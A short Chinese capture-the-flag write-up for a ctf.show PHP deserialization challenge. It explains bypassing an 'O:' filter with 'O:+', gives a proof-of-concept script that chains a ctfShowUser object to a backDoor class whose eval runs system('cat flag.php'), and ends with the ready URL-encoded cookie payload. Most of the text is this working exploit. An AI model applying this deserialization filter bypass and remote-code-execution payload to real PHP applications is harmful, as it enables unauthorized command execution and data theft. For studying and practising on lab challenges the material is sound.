整体来说和上一题差不多,但会有点差别
一是类的属性从私有变成共有了,这算是变简单了,然后就是下面有过滤 O:
,过滤方法的化就是用O:+
绕过
POC
<?php
class ctfShowUser{
public $username='xxxxxx';
public $password='xxxxxx';
public $isVip=false;
public $class = 'info';
}
class backDoor{
public $code;
public function getInfo(){
eval($this->code);
}
}
$a = new backDoor();
$a -> code = 'system("cat flag.php");';
$b = new ctfShowUser();
$b -> class = $a;
echo((str_replace('C:','C:+',str_replace('O:', 'O:+',serialize($b)))));
payload
get:
http://30e93501-8680-4bd1-8a76-7563d7f2cf57.challenge.ctf.show/?username=xxxxxx&password=xxxxxx
cookies:
user=O%3A%2B11%3A%22ctfShowUser%22%3A4%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bb%3A0%3Bs%3A5%3A%22class%22%3BO%3A%2B8%3A%22backDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A23%3A%22system%28%22cat+flag.php%22%29%3B%22%3B%7D%7D